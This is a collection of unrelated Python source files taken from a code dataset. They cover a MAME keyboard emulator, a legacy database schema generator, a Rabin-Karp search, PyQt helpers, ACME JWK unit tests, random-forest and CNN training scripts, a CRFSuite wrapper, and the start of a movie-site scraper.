'public'\n","sub_path":"src/vsa/infra/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"334223867","text":"\"\"\"A module for keyboard presses emulation.\n\nAs MAME does not always register single presses with pyautogui certain functions perform multiple presses to\ncircumvent that.\n\nWARNING: MAME does not accept keyboard emulators on Windows as of more recent versions (MacOS works,\nLinux not tested). To fix that, a custom version of MAME with DIRECT_INPUT enabled must be used.\n\"\"\"\n\nimport pyautogui\n\n\ndef move_car_in_direction(direction):\n for key in possible_keys_for_move:\n if keys_for_direction[direction] and key in keys_for_direction[direction]:\n pyautogui.keyDown(key)\n else:\n pyautogui.keyUp(key)\n\n\ndef exit_game():\n pyautogui.press(\"esc\", interval=0.1)\n pyautogui.press(\"esc\", interval=0.1)\n\n\ndef restart_game():\n pyautogui.press(\"f3\", interval=0.1)\n pyautogui.press(\"f3\", interval=0.1)\n\n\ndef insert_coin():\n pyautogui.press(\"5\", interval=0.1)\n pyautogui.press(\"5\", interval=0.1)\n pyautogui.press(\"5\", interval=0.1)\n\n\nkeys_for_direction = {\n 'L': ['left'],\n 'R': ['right'],\n 'F': ['up'],\n 'FR': ['up', 'right'],\n 'FL': ['up', 'left'],\n 'S': None\n}\n\npossible_keys_for_move = ['up', 'left', 'right']\n","sub_path":"src/gamecontrols.py","file_name":"gamecontrols.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"98082588","text":"def fields_template():\n\n alldefs = dict()\n dblink = 'integer'\n\n #alldefs[\"TblAdmins\"] = dict(\n #IIDD='string',\n #Name='string',\n #Password='string',\n #)\n\n alldefs[\"TblDefaults\"] = dict(\n IIDD='integer',\n AdminMaxResultsInPage='integer',\n UserMaxResultsInPage='integer',\n PhotosInMember='integer',\n PhotosInEvent='integer',\n NormalPhotoWidth='integer',\n ThumbnailPhotoWidth='integer',\n AdminThumbnailPhotoHeight='integer',\n UserMaxRandomEventsInMainPage='integer',\n PageHitsCountingStatus='integer',\n CommentsEmailName='string',\n CommentsEmailAddress='string',\n IdentifyEmailName='string',\n IdentifyEmailAddress='string',\n MailHost='string',\n MailPort='integer',\n MailFromAddress='string',\n MailFromName='string',\n UserMaxPhotosInUnidentifiedPage='integer',\n AdminHrefInitialAddress='string',\n )\n\n #alldefs[\"TblDocuments\"] = dict(\n #IIDD='string',\n #ArchiveNum='string',\n #DocumentDate='string',\n #Description='string',\n #LocationInDisk='string',\n #StatusID='string',\n #)\n\n #alldefs[\"TblEventDocuments\"] = dict(\n #EventID='string',\n #DocumentID='string',\n #EventDocumentRank='string',\n #)\n\n alldefs[\"TblEventMembers\"] = dict(\n EventID=dblink,\n MemberID=dblink,\n EventMemberRank='integer',\n )\n\n alldefs[\"TblEventPhotos\"] = dict(\n EventID=dblink,\n PhotoID=dblink,\n EventPhotoRank='integer',\n )\n\n alldefs[\"TblEventTypes\"] = dict(\n IIDD=dblink,\n Name='string',\n Description='string',\n ImageName='string',\n )\n\n alldefs[\"TblEvents\"] = dict(\n IIDD=dblink,\n Name='string',\n SSource='string',\n EventDate='string', #may be missing, just year, years range or true date\n Place='string',\n Description='string',\n KeyWords='string',\n EventRank='integer',\n TypeID=dblink, #db.TblEventTypes\n ObjectID=dblink, #db.TblObjects\n StatusID=dblink, #db.TblStatuses\n PageHits='integer',\n DescriptionNoHtml='string',\n )\n\n alldefs[\"TblFamilyConnectionTypes\"] = dict(\n IIDD=dblink,\n Description='string',\n )\n\n #alldefs[\"TblHrefCategories\"] = dict(\n #IIDD='string',\n #Name='string',\n #CategoryRank='string',\n #)\n\n #alldefs[\"TblHrefCategoryCategories\"] = dict(\n #ChildCategoryID='string',\n #ParentCategoryID='string',\n #ChildHierarchyLevel='string',\n #)\n\n alldefs[\"TblHrefCategoryHrefs\"] = dict(\n HrefID=dblink, #db.Tbl???\n CategoryID='string',\n )\n\n alldefs[\"TblHrefTypes\"] = dict(\n IIDD=dblink,\n Name='string',\n )\n\n #alldefs[\"TblHrefs\"] = dict(\n #IIDD='string',\n #Name='string',\n #Description='string',\n #Href='string',\n #HrefTypeID='string',\n #HrefRank='string',\n #DescriptionNoHtml='string',\n #)\n\n #alldefs[\"TblJokes\"] = dict(\n #IIDD='string',\n #Description='string',\n #)\n\n alldefs[\"TblMemberConnections\"] = dict(\n IIDD=dblink,\n MemberID=dblink, #db.TblMdembers\n ConnectToMemberID=dblink, #db.TblMdembers\n ConnectionTypeID=dblink, #db.TblFamilyConnectionTypes\n Name='string',\n DateOfBirth='string', #redundant\n PlaceOfBirth='string',\n Professions='string',\n )\n\n #alldefs[\"TblMemberDocuments\"] = dict(\n #MemberID='string',\n #DocumentID='string',\n #MemberDocumentRank='string',\n #)\n\n alldefs[\"TblMemberPhotos\"] = dict(\n MemberID=dblink, #db.TblMembers\n PhotoID=dblink, #db.TblMembers\n MemberPhotoRank='integer',\n )\n\n alldefs[\"TblMembers\"] = dict(\n IIDD=dblink,\n Name='string',\n FormerName='string',\n DateOfBirth='string', #may be missing, year or range...\n PlaceOfBirth='string',\n DateOfAlia='string', #missing or year\n DateOfMember='string', #missing or year\n Education='string', #drop it\n Institute='string', #drop it\n Professions='string', #drop it\n LifeStory='text',\n KeyWords='string',\n ObjectID=dblink, #db.TblObjects. probably reduntdant\n NickName='string',\n StatusID=dblink, #db.TblStatuses\n PageHits='integer',\n LifeStoryNoHtml='text',\n )\n\n alldefs[\"TblObjects\"] = dict(\n IIDD=dblink,\n Description='string',\n Priority='integer',\n HebrewDescription='string',\n )\n\n alldefs[\"TblPhotos\"] = dict(\n IIDD=dblink,\n ArchiveNum='string',\n PhotoDate='string', #range, year, etc.\n Name='string',\n Description='string',\n Photographer='string',\n KeyWords='string',\n LocationInDisk='string',\n PhotoRank='integer',\n ObjectID=dblink, #db.TblObjects\n Recognized='boolean',\n StatusID=dblink, #db.TblStatuses\n PageHits='integer',\n DescriptionNoHtml='string',\n )\n\n alldefs[\"TblStatuses\"] = dict(\n IIDD=dblink,\n Name='string',\n )\n\n alldefs[\"TblSuperAdmins\"] = dict(\n IIDD=dblink,\n Name='string',\n Password='string',\n )\n\n #alldefs[\"TblSuperAdminsNickNames\"] = dict(\n #IIDD='string',\n #NickName='string',\n #)\n\n alldefs[\"TblTerms\"] = dict(\n IIDD=dblink,\n Name='string',\n TermTranslation='string',\n Background='string',\n InventedBy='string',\n InventedByMemberID=dblink, #db.TblMembers\n ObjectID=dblink, #db.TblObjects\n StatusID=dblink, #db.TblStatuses\n PageHits='integer',\n BackgroundNoHtml='string',\n )\n\n #alldefs[\"vw_displayableMembers\"] = dict(\n #IIDD='string',\n #Name='string',\n #)\n\n #alldefs[\"vw_displayablePhotoIDs\"] = dict(\n #PhotoID='string',\n #)\n\n #alldefs[\"vw_siteEventPhotosGroupedAndOrd\"] = dict(\n #EventID='string',\n #FixedRandomValue='string',\n #)\n\n #alldefs[\"vw_siteEventPhotosHighestRanke1\"] = dict(\n #EventID='string',\n #PhotoPath='string',\n #)\n\n #alldefs[\"vw_siteEventPhotosHighestRanked\"] = dict(\n #EventID='string',\n #PhotoID='string',\n #)\n\n #alldefs[\"vw_siteEventPhotosOrderedByRan1\"] = dict(\n #EventID='string',\n #FixedRandomValue='string',\n #EventPhotoRank='string',\n #)\n\n #alldefs[\"vw_siteEventPhotosOrderedByRank\"] = dict(\n #EventID='string',\n #PhotoID='string',\n #EventPhotoRank='string',\n #RandomValue='string',\n #)\n\n #alldefs[\"vw_siteMemberPhotosGroupedAndOr\"] = dict(\n #MemberID='string',\n #FixedRandomValue='string',\n #)\n\n #alldefs[\"vw_siteMemberPhotosHighestRank1\"] = dict(\n #MemberID='string',\n #PhotoPath='string',\n #)\n\n #alldefs[\"vw_siteMemberPhotosHighestRanke\"] = dict(\n #MemberID='string',\n #PhotoID='string',\n #)\n\n #alldefs[\"vw_siteMemberPhotosOrderedByRa1\"] = dict(\n #MemberID='string',\n #FixedRandomValue='string',\n #MemberPhotoRank='string',\n #)\n\n #alldefs[\"vw_siteMemberPhotosOrderedByRan\"] = dict(\n #MemberID='string',\n #PhotoID='string',\n #MemberPhotoRank='string',\n #RandomValue='string',\n #)\n\n return alldefs\n\ndef create_db_defs():\n out_name = '/home/haim/fossil_projects/gbs/private/db_defs.py'\n alldefs = fields_template()\n with open(out_name, 'w') as out:\n for tbl in sorted(alldefs):\n out.write(\"db.define_table('{}',\\n\".format(tbl))\n fields = alldefs[tbl]\n for field in sorted(fields):\n out.write(\" Field('{}', type='{}'),\\n\".format(field, fields[field]))\n out.write(')\\n\\n')\n \nif __name__ == '__main__':\n create_db_defs() \n","sub_path":"modules/porting/old_db_mappings.py","file_name":"old_db_mappings.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417708666","text":"def Rabin_Karp(p,c):\n\t'''\n\tRabin-Karp Algorithm -- 滚动哈希算法:\n\t选取两个合适的互素常数b和h(l plen:\n\t\treturn False\n\tres = []\n\t# hash radix\n\tb = 2 # 100000000007\n\tt = b**clen\n\n\t# 计算p和c长度为clen的前缀对应的哈希值\n\tphash=0\n\tchash=0\n\tfor i in range(clen):\n\t\tphash = phash * b + ord(p[i])\n\t\tchash = chash * b + ord(c[i])\n\n\t# 对p不断右移一位,更新哈希值并判断\n\tfor x in range(0, plen-clen+1):\n\t\tif phash == chash:\n\t\t\tres.append(x)\n\t\tif x + clen < plen:\n\t\t\tphash = phash*b - ord(p[x])*t + ord(p[x+clen])\n\n\tif res:\n\t\treturn res\n\telse:\n\t\treturn False\n\n\nprint(Rabin_Karp('abcbc','ebc')) ","sub_path":"String Problem/Rabin_Karp.py","file_name":"Rabin_Karp.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230549123","text":"import os\nimport abacusSoftware.constants as constants\nimport pyAbacus as abacus\nfrom PyQt5 import QtGui\n\ndef timeInUnitsToMs(time):\n value = 0\n if 'ms' in time:\n value = int(time.replace(' ms', ''))\n elif 's' in time:\n value = float(time.replace(' s', ''))\n value = int(1000 * value)\n return value\n\ndef setSamplingComboBox(comboBox, values = abacus.constants.SAMPLING_VALUES, default_value = abacus.constants.SAMPLING_DEFAULT_VALUE):\n comboBox.clear()\n\n model = comboBox.model()\n for row in values:\n if row < 1000:\n item = QtGui.QStandardItem(\"%d ms\" % row)\n elif row < 10000:\n item = QtGui.QStandardItem(\"%.1f s\" % (row / 1000))\n else:\n item = QtGui.QStandardItem(\"%d s\" % (row / 1000))\n # if row < abacus.SAMP_CUTOFF:\n # item.setBackground(QtGui.QColor('red'))\n # item.setForeground(QtGui.QColor('white'))\n model.appendRow(item)\n if default_value < 1000: unit = \"ms\"\n else: unit = \"s\"; value = default_value // 1000\n comboBox.setCurrentIndex(comboBox.findText(\"%d %s\"%(value, unit)))\n\ndef setCoincidenceSpinBox(spinBox, value = abacus.constants.COINCIDENCE_WINDOW_DEFAULT_VALUE):\n spinBox.setMinimum(abacus.constants.COINCIDENCE_WINDOW_MINIMUM_VALUE)\n spinBox.setMaximum(abacus.constants.COINCIDENCE_WINDOW_MAXIMUM_VALUE)\n spinBox.setSingleStep(abacus.constants.COINCIDENCE_WINDOW_STEP_VALUE)\n spinBox.setValue(value)\n \ndef setDelaySpinBox(spinBox, value = abacus.constants.DELAY_DEFAULT_VALUE):\n spinBox.setMinimum(abacus.constants.DELAY_MINIMUM_VALUE)\n spinBox.setMaximum(abacus.constants.DELAY_MAXIMUM_VALUE)\n spinBox.setSingleStep(abacus.constants.DELAY_STEP_VALUE)\n spinBox.setValue(value) \n\ndef setSleepSpinBox(spinBox, value = abacus.constants.SLEEP_DEFAULT_VALUE):\n spinBox.setMinimum(abacus.constants.SLEEP_MINIMUM_VALUE)\n spinBox.setMaximum(abacus.constants.SLEEP_MAXIMUM_VALUE)\n spinBox.setSingleStep(abacus.constants.SLEEP_STEP_VALUE)\n spinBox.setValue(value)\n\ndef findWidgets(class_, widget):\n return [att for att in dir(class_) if widget in att]\n\ndef unicodePath(path):\n return path.replace(\"\\\\\", \"/\")\n\ndef readConstantsFile():\n if os.path.exists(constants.SETTINGS_PATH):\n with open(constants.SETTINGS_PATH) as file:\n for line in file:\n try:\n exec(\"constants.%s\" % line)\n except SyntaxError as e:\n pass\n constants.SETTING_FILE_EXISTS = True\n else:\n print(\"Settings file not found at: %s\"%constants.SETTINGS_PATH)\n\ndef updateConstants(class_):\n for (name, action) in zip(constants.WIDGETS_NAMES, constants.WIDGETS_SET_ACTIONS):\n attributes = findWidgets(class_, name)\n for att in attributes:\n if att in dir(constants):\n val = eval(\"constants.%s\"%att)\n if name != \"comboBox\":\n try: #if the element does not exist, skip. Example: sleep_C in a 2ch device\n exec(action%(att, val)) \n except:\n pass\n \n else:\n try: #if the element does not exist, skip. Example: sleep_C in a 2ch device\n exec(action%(att, att, val))\n except:\n pass\n\ndef findDocuments():\n if constants.CURRENT_OS == \"win32\":\n import ctypes.wintypes\n buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)\n ctypes.windll.shell32.SHGetFolderPathW(None, 5, None, 0, buf)\n buf = buf.value\n else:\n buf = os.path.expanduser(\"~\")\n return buf\n","sub_path":"AbacusSoftware/abacusSoftware/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"163734257","text":"\"\"\"Tests for acme.jose.jwk.\"\"\"\nimport os\nimport pkg_resources\nimport unittest\n\nfrom Crypto.PublicKey import RSA\n\nfrom acme.jose import errors\nfrom acme.jose import util\n\n\nRSA256_KEY = util.HashableRSAKey(RSA.importKey(pkg_resources.resource_string(\n __name__, os.path.join('testdata', 'rsa256_key.pem'))))\nRSA512_KEY = util.HashableRSAKey(RSA.importKey(pkg_resources.resource_string(\n __name__, os.path.join('testdata', 'rsa512_key.pem'))))\n\n\nclass JWKOctTest(unittest.TestCase):\n \"\"\"Tests for acme.jose.jwk.JWKOct.\"\"\"\n\n def setUp(self):\n from acme.jose.jwk import JWKOct\n self.jwk = JWKOct(key='foo')\n self.jobj = {'kty': 'oct', 'k': 'foo'}\n\n def test_to_partial_json(self):\n self.assertEqual(self.jwk.to_partial_json(), self.jobj)\n\n def test_from_json(self):\n from acme.jose.jwk import JWKOct\n self.assertEqual(self.jwk, JWKOct.from_json(self.jobj))\n\n def test_from_json_hashable(self):\n from acme.jose.jwk import JWKOct\n hash(JWKOct.from_json(self.jobj))\n\n def test_load(self):\n from acme.jose.jwk import JWKOct\n self.assertEqual(self.jwk, JWKOct.load('foo'))\n\n def test_public(self):\n self.assertTrue(self.jwk.public() is self.jwk)\n\n\nclass JWKRSATest(unittest.TestCase):\n \"\"\"Tests for acme.jose.jwk.JWKRSA.\"\"\"\n\n def setUp(self):\n from acme.jose.jwk import JWKRSA\n self.jwk256 = JWKRSA(key=RSA256_KEY.publickey())\n self.jwk256_private = JWKRSA(key=RSA256_KEY)\n self.jwk256json = {\n 'kty': 'RSA',\n 'e': 'AQAB',\n 'n': 'm2Fylv-Uz7trgTW8EBHP3FQSMeZs2GNQ6VRo1sIVJEk',\n }\n self.jwk512 = JWKRSA(key=RSA512_KEY.publickey())\n self.jwk512json = {\n 'kty': 'RSA',\n 'e': 'AQAB',\n 'n': 'rHVztFHtH92ucFJD_N_HW9AsdRsUuHUBBBDlHwNlRd3fp5'\n '80rv2-6QWE30cWgdmJS86ObRz6lUTor4R0T-3C5Q',\n }\n\n def test_equals(self):\n self.assertEqual(self.jwk256, self.jwk256)\n self.assertEqual(self.jwk512, self.jwk512)\n\n def test_not_equals(self):\n self.assertNotEqual(self.jwk256, self.jwk512)\n self.assertNotEqual(self.jwk512, self.jwk256)\n\n def test_load(self):\n from acme.jose.jwk import JWKRSA\n self.assertEqual(\n JWKRSA(key=util.HashableRSAKey(RSA256_KEY)), JWKRSA.load(\n pkg_resources.resource_string(\n __name__, os.path.join('testdata', 'rsa256_key.pem'))))\n\n def test_public(self):\n self.assertEqual(self.jwk256, self.jwk256_private.public())\n\n def test_to_partial_json(self):\n self.assertEqual(self.jwk256.to_partial_json(), self.jwk256json)\n self.assertEqual(self.jwk512.to_partial_json(), self.jwk512json)\n\n def test_from_json(self):\n from acme.jose.jwk import JWK\n self.assertEqual(self.jwk256, JWK.from_json(self.jwk256json))\n # TODO: fix schemata to allow RSA512\n #self.assertEqual(self.jwk512, JWK.from_json(self.jwk512json))\n\n def test_from_json_hashable(self):\n from acme.jose.jwk import JWK\n hash(JWK.from_json(self.jwk256json))\n\n def test_from_json_non_schema_errors(self):\n # valid against schema, but still failing\n from acme.jose.jwk import JWK\n self.assertRaises(errors.DeserializationError, JWK.from_json,\n {'kty': 'RSA', 'e': 'AQAB', 'n': ''})\n self.assertRaises(errors.DeserializationError, JWK.from_json,\n {'kty': 'RSA', 'e': 'AQAB', 'n': '1'})\n\n\nif __name__ == '__main__':\n unittest.main() # pragma: no cover\n","sub_path":"acme/jose/jwk_test.py","file_name":"jwk_test.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"55490487","text":"'''\r\nCreated on 2018/09/19\r\n\r\n@author: Taichi\r\n'''\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.colors import ListedColormap\r\n\r\ndef plot_decision_regions(x,y,classifier,test_idx=None,resolution=0.02):\r\n markers=('s','x','o','^','v')\r\n colors=('red','blue','lightgreen','gray','cyan')\r\n cmap=ListedColormap(colors[:len(np.unique(y))])\r\n\r\n x1_min,x1_max=x[:,0].min()-1,x[:,0].max+1\r\n x2_min,x2_max=x[:,1].min()-1,x[:,1].max+1\r\n\r\n xx1,xx2=np.meshgrid(np.arange(x1_min,x1_max,resolution),\r\n np.arange(x2_min,x2_max,resolution))\r\n Z=classifier.predict(np.array([xx1.ravel(),xx2.ravel()]).T)\r\n Z=Z.reshape(xx1.shape)\r\n plt.contourf(xx1,xx2,Z,alpha=0.4,cmap=cmap)\r\n plt.xlim(xx1.min(),xx1.max())\r\n plt.ylim(xx2.min(),xx2.max())\r\n\r\n for idx, cl in enumerate(np.unique(y)):\r\n plt.scatter(x=x[y==cl,0],y=x[y==cl,1],\r\n alpha=0.8,c=cmap(idx),\r\n marker=markers[idx],label=cl)\r\n if test_idx:\r\n x_test,y_test=x[test_idx,:],y[test_idx]\r\n plt.scatter(x_test[:,0],x_test[:,1],c='',alpha=1.0,linewidth=1,marker='o',s=55,lable='test_set')\r\n\r\nlink=''\r\nlink2=''\r\ndf=pd.read_csv(link,encoding='cp932')\r\ndf=pd.read_table(link,encoding='cp932')\r\ndf=pd.read_excel(link,sheetname='',encoding='cp932')\r\ndf2=pd.read_csv(link2,encoding='cp932')\r\ndf2=pd.read_table(link2,encoding='cp932')\r\ndf2=pd.read_excel(link2,sheetname='',encoding='cp932')\r\n\r\n#二つのデータを分割したが、k分割などで分けてもok\r\nx_train=df[''].values\r\ny_train=df[''].values\r\nx_test=df2[''].values\r\ny_test=df2[''].values\r\nx_combined=np.vstack([x_train,x_test])\r\ny_combined=np.hstack([y_train,y_test])\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n#エントロピーを指標とするランダムフォレストのインスタンスの生成\r\nforest=RandomForestClassifier(criterion='entropy',n_estimators=10,random_state=1,n_jobs=2)\r\n#ランダムフォレストのモデルにトレーニングデータを適合させる\r\nforest.fit(x_train,y_train)\r\nplot_decision_regions(x_combined,y_combined,classifier=forest,test_idx=range(105,150))\r\nplt.xlabel('')\r\nplt.ylabel('')\r\nplt.legend(loc='upper left')\r\nplt.show()","sub_path":"RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"66516401","text":"from __future__ import division, print_function, absolute_import\n\nimport tflearn\nfrom tflearn.data_utils import shuffle, to_categorical\nfrom tflearn.layers.core import input_data, dropout, fully_connected\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\nfrom tflearn.layers.normalization import local_response_normalization\nfrom tflearn.data_preprocessing import ImagePreprocessing\nfrom tflearn.layers.estimator import regression\n\n\ndef get_data():\n # Data loading and preprocessing\n from tflearn.datasets import cifar10\n (X, Y), (X_test, Y_test) = cifar10.load_data()\n X, Y = shuffle(X, Y)\n Y = to_categorical(Y, 10)\n Y_test = to_categorical(Y_test, 10)\n return (X, Y), (X_test, Y_test)\n\n\ndef get_network():\n # Building convolutional network\n network = input_data(shape=[None, 32, 32, 3], name='input')\n network = conv_2d(network, 32, 3, activation='relu', regularizer=\"L2\")\n network = max_pool_2d(network, 2)\n network = conv_2d(network, 64, 3, activation='relu', regularizer=\"L2\")\n network = max_pool_2d(network, 2)\n\n network = conv_2d(network, 128, 3, activation='relu', regularizer=\"L2\")\n network = max_pool_2d(network, 2)\n\n network = fully_connected(network, 256, activation='relu')\n network = dropout(network, 0.8)\n network = fully_connected(network, 10, activation='softmax')\n network = regression(network, optimizer='adam', learning_rate=0.01,\n loss='categorical_crossentropy', name='target')\n return network\n\n\ndef main():\n name = 'model6'\n (X, Y), (X_test, Y_test) = get_data()\n network = get_network()\n\n # Training\n model = tflearn.DNN(network, tensorboard_verbose=0, checkpoint_path='checkpoints/' + name + '.tfl.ckpt')\n\n model.load('checkpoints/' + name + '.tfl')\n model.fit({'input': X}, {'target': Y}, n_epoch=12,\n validation_set=({'input': X_test}, {'target': Y_test}),\n snapshot_step=100, show_metric=True, batch_size=96, run_id='cifar10_cnn6')\n\n # Manually save model\n model.save('checkpoints/' + name + '.tfl')\n\n\nmain()\n","sub_path":"tensor6.py","file_name":"tensor6.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"459062061","text":"import os\nimport sys\nimport warnings\n\nimport pycrfsuite\n\nfrom nalaf.structures.data import Label\nfrom nalaf.learning.taggers import Tagger\n\n\nclass PyCRFSuite:\n\n def __init__(self, model_file=None):\n self.model_file = model_file\n\n if self.model_file is None:\n self.tagger = None\n else:\n self.tagger = pycrfsuite.Tagger()\n self.tagger.open(self.model_file)\n\n\n def annotate(self, corpus, class_id):\n \"\"\"\n :type corpus: nalaf.structures.data.Dataset\n :type class_id: str ~ to annotate with\n \"\"\"\n\n for sentence in corpus.sentences():\n labels = self.tagger.tag(pycrfsuite.ItemSequence(token.features for token in sentence))\n\n for token_index in range(len(sentence)):\n label = labels[token_index]\n sentence[token_index].predicted_labels = [Label(label, self.tagger.marginal(label, token_index))]\n\n corpus.form_predicted_annotations(class_id)\n\n\n @staticmethod\n def train(data, model_file, params=None):\n \"\"\"\n :type data: nalaf.structures.data.Dataset\n :type model_file: str ~ filename (from local file system) to save trained model to. If None, no model is saved.\n \"\"\"\n\n trainer = pycrfsuite.Trainer()\n if params is not None:\n trainer.set_params(params)\n\n for sentence in data.sentences():\n trainer.append(pycrfsuite.ItemSequence([token.features for token in sentence]),\n [token.original_labels[0].value for token in sentence])\n\n # The CRFSuite library handles the \"pickling\" of the file; saves the model here\n trainer.train(model_file)\n\n\n @staticmethod\n def tag(data, model_file, class_id):\n warnings.warn('Use non-static `annotate` instead', DeprecationWarning)\n\n \"\"\"\n :type data: nalaf.structures.data.Dataset\n :type model_file: str\n \"\"\"\n\n tagger = pycrfsuite.Tagger()\n tagger.open(model_file)\n\n for sentence in data.sentences():\n labels = tagger.tag(pycrfsuite.ItemSequence(token.features for token in sentence))\n\n for token_index in range(len(sentence)):\n label = labels[token_index]\n sentence[token_index].predicted_labels = [Label(label, tagger.marginal(label, token_index))]\n\n data.form_predicted_annotations(class_id)\n\n\nclass CRFSuite:\n \"\"\"\n Basic class for interaction with CRFSuite\n \"\"\"\n\n def __init__(self, directory, minify=False):\n warnings.warn('Deprecated. Please use PyCRFSuite instead', DeprecationWarning)\n\n self.directory = os.path.abspath(directory)\n \"\"\"the directory where the CRFSuite executable is located\"\"\"\n self.model_filename = 'example_entity_model'\n \"\"\"name to be used for saving the model\"\"\"\n if sys.platform.startswith('linux'):\n self.crf_suite_call = './crfsuite'\n else:\n self.crf_suite_call = 'crfsuite'\n self.minify = minify\n \"\"\"controls whether to replace feature names with an index in order to minimize input file length\"\"\"\n\n\n def create_input_file(self, dataset, mode):\n \"\"\"\n Creates the input files for training, testing or prediction in the appropriate format required by CRFSuite.\n Saves the files in the same directory where the executable is located.\n\n :type dataset: nalaf.structures.data.Dataset\n :param mode: one of the following 'train' or 'test' or 'predict'\n :type mode: str\n \"\"\"\n if self.minify:\n key_map = {key: index for index, key in\n enumerate(set(key for token in dataset.tokens() for key in token.features.keys()))}\n key_string = lambda key: key_map[key]\n else:\n key_string = lambda key: key\n\n with open(os.path.join(self.directory, mode), 'w', encoding='utf-8') as file:\n for sentence in dataset.sentences():\n for token in sentence:\n features = '\\t'.join(['{}:{}'.format(key_string(key), value)\n if type(value) is float\n else '{}={}'.format(key_string(key), str(value).replace(':', '_COLON_'))\n for key, value in token.features.items()])\n\n if mode in ('train', 'test'):\n label = token.original_labels[0].value\n else:\n label = '?'\n file.write('{}\\t{}\\n'.format(label, features))\n file.write('\\n')\n\n\n def learn(self, options=''):\n \"\"\"\n Train and save a CRF model with the latest train file.\n \"\"\"\n os.chdir(self.directory)\n if options:\n os.system('{} learn {}'.format(self.crf_suite_call, options))\n else:\n os.system('{} learn -m {} train'.format(self.crf_suite_call, self.model_filename))\n\n\n def tag(self, options=''):\n \"\"\"\n Test a CRF model with the latest model and test file.\n \"\"\"\n os.chdir(self.directory)\n if options:\n os.system('{} tag {}'.format(self.crf_suite_call, options))\n else:\n os.system('{} tag -qt -m {} test'.format(self.crf_suite_call, self.model_filename))\n\n\n def read_predictions(self, dataset, class_id, prediction_file='output.txt'):\n \"\"\"\n :type dataset: nalaf.structures.data.Dataset\n\n Reads in the predictions made by our model for each token and stores them into token.predicted_label[]\n\n Requires a dataset object and the output prediction file.\n\n The default output prediction file is 'output.txt'. The format is:\n * [predicted label]:[marginal probability]\n * in new line for each token\n * followed by a blank line for the end of the sentence\n\n IMPORTANT NOTE:\n Assumes a call to the test() function was made previously with the 'i' option included.\n Furthermore, it assumes we are calling it with the same dataset object used to create the test file.\n\n For example first we would call:\n * crf.create_input_file(dataset=test, mode='test')\n * crf.test(options='-m example_entity_model -i test > output.txt')\n Then we would call:\n * crf.read_predictions(dataset=test)\n \"\"\"\n\n os.chdir(self.directory)\n with open(prediction_file) as file:\n for sentence in dataset.sentences():\n for token in sentence:\n label, probability = file.readline().split(':')\n token.predicted_labels = [Label(label, float(probability))]\n\n file.readline() # skip the empty line signifying new sentence\n\n # call form_predicted_annotations() to populate the mention level predictions\n dataset.form_predicted_annotations(class_id)\n\n\nclass CRFSuiteTagger(Tagger):\n \"\"\"\n Performs tagging with a binary model using CRFSuite\n\n :type crf_suite: nalaf.learning.crfsuite.CRFSuite\n \"\"\"\n\n def __init__(self, predicts_classes, crf_suite, model_file='example_entity_model'):\n warnings.warn('Use PyCRFSuite', DeprecationWarning)\n\n super().__init__(predicts_classes)\n self.crf_suite = crf_suite\n \"\"\"an instance of CRFSuite used to actually generate predictions\"\"\"\n self.model_file = model_file\n \"\"\"path to the binary model used for generating predictions\"\"\"\n\n def tag(self, dataset):\n \"\"\"\n :type dataset: nalaf.structures.data.Dataset\n \"\"\"\n self.crf_suite.create_input_file(dataset, 'predict')\n self.crf_suite.tag('-m {} -i predict > output.txt'.format(self.model_file))\n self.crf_suite.read_predictions(dataset)\n","sub_path":"nalaf/learning/crfsuite.py","file_name":"crfsuite.py","file_ext":"py","file_size_in_byte":7835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"87071015","text":"from lib.base_action import BaseAction\n\n\nclass CreateIP(BaseAction):\n def run(self, subnet_network_mask=None, subnet_name=None,\n vrf_group_id=None, vrf_group=None,\n ipaddress=None, macaddress=None, ip_type=None, tags=None,\n device_name=None, available=None, clear_all=None,\n debug=False):\n\n payload = {\n \"ipaddress\": ipaddress, \"subnet\": subnet_name,\n \"macaddress\": macaddress, \"ip_type\": ip_type,\n \"tags\": tags, \"device\": device_name\n }\n\n print(\"payload: %s\" % payload)\n d42_headers = {'Accept': 'application/json'}\n response = self.post(\n endpoint=\"ips/\",\n payload=payload,\n headers=d42_headers\n )\n # d42 api agent returns response.json(0) if response.ok...:\n if type(response) is dict:\n return response\n else:\n return response.text\n","sub_path":"actions/create_or_edit_ip.py","file_name":"create_or_edit_ip.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"485970988","text":"import os\nimport threading\nfrom queue import Queue\nimport logging\nimport requests\nfrom requests.exceptions import ConnectionError\nfrom bs4 import BeautifulSoup\nfrom page_urls import get_page_links,get_number_of_pages\nfrom constants import all_movies_by_year,header\nimport re\nimport json\nparams = {'year_selected':2018, 'sort':'desc'}\nimport time\nimport random\nfrom threading import Lock,Thread\n\nlogging.basicConfig(format='%(asctime)s -%(funcName)s - %(levelname)s - %(message)s',\n datefmt='%d-%b-%y %H:%M:%S',\n level=logging.INFO, filename=\"log_file.log\")\n\nextract_year_from_url = re.compile('year_selected=(\\d{4})')\n\ndef get_year(url):\n return 